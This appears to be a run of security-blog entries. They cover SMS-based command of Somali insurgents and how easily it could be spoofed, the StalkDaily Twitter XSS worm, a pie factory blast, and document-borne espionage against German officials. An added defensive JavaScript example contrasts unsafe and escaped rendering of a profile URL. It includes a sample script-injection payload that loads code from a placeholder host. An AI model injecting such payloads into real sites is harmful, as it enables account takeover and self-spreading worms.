Somalia is getting attention from BBC NEWS | Africa for having a “text message insurgency”.
The leaders of the group – which has taken over swathes of central and southern Somalia – are unknown to their subordinates.
The middle lieutenants get their orders through text messages, or phone calls from recognised voices, giving them proof the instructions are coming from the right person.
The leaders of al-Shabab are called “emirs” and they do not usually come from the region they administer.
Although I see the attempt at novelty, the story feels a bit thin to me. The insurgents also use pickup trucks and machine guns. Why are text messages so different from other technologies in terms of our expectations for use by rebellious groups?
More interesting to me is the fact that these soldiers have a weak link to their superiors and are given no way to authenticate instructions other than a recognized voice. That certainly does not help for SMS messages. How do they find trust? Unless there are keys or secrets, compromising the insurgent command structure therefore seems trivial. I wonder what would happen if the telecom(s) they use sent a “disband and return to work now” SMS. More sinister would be a “gather at x location and wear a bright red hat” instruction.
I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:
Twitter allowed encoding in a profile’s URL field, so the malicious JavaScript would run as soon as someone viewed a compromised Twitter profile page. Then anyone who looked at your page would be infected as well, and so forth.
An excellent way to prevent this is with “noscript” or similar utilities that require you to whitelist JavaScript, as DCortesi mentions. You would be prompted to allow a uuuq.com script, at which point you hopefully would say no and realize the Twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.
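The server-side counterpart to that browser-side defense, as an added example (not code from the original post or from Twitter): a profile URL field that is validated on input and escaped on output, shown beside the flawed pattern of pasting the stored value straight into the page. The function names and sample inputs are constructed for illustration.

```javascript
// Constructed sample inputs (not taken from the actual worm).
const BENIGN = "https://example.com/me";
const BREAKOUT = 'http://example.com/"><script src="//x.example/a.js"></script>';

// Flawed pattern: the stored value is pasted into the page unchanged,
// so a quote in it ends the href attribute and the rest is parsed as markup.
function renderProfileLinkNaive(input) {
  return `<a href="${input}">${input}</a>`;
}

// Escape the characters that are significant in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only absolute http(s) URLs; return the parser's normalized form or null.
function normalizeProfileUrl(input) {
  if (typeof input !== "string" || input.length > 2048) return null;
  let url;
  try {
    url = new URL(input);
  } catch {
    return null; // not parseable as an absolute URL
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  return url.href; // double quotes and angle brackets are percent-encoded here
}

// Hardened pattern: validate on input, escape on output.
function renderProfileLink(input) {
  const href = normalizeProfileUrl(input);
  if (href === null) return ""; // render no link rather than a broken one
  const safe = escapeHtml(href);
  return `<a href="${safe}" rel="nofollow noopener">${safe}</a>`;
}

console.log(renderProfileLinkNaive(BREAKOUT)); // script tag survives as markup
console.log(renderProfileLink(BREAKOUT));      // single inert anchor
console.log(renderProfileLink("javascript:alert(1)")); // rejected scheme
```

Escaping stays in place even though the URL parser already percent-encodes the breakout characters, so the output is safe if the validation step is later changed or bypassed.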
The explosion wrecked the Andrew Jones Pies factory in Old Leeds Road early this morning and police confirmed shortly before 11am that one person had died as the brick-built building was shattered by the blast.
Although they made a chicken pot pie, fowl play is not suspected.
German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. In January 2008, various German officials received an e-mail with an attached document titled: “Analysis of Chinese Government Policy Toward Tibet.” The sender was supposedly a Tibetan organization in the United States. A malicious program was hidden in the analysis.
The giant question, of course, is whether anyone can trace anything conclusively. Since plausible denial is so effective in the physical world, I suspect technology will generate the same results only faster. Sloppy work by the spies will lead to convictions, but otherwise there will be a tangled web of dead ends to sift through, creating demand for better correlation and monitoring tools.
a blog about the poetry of information security, since 1995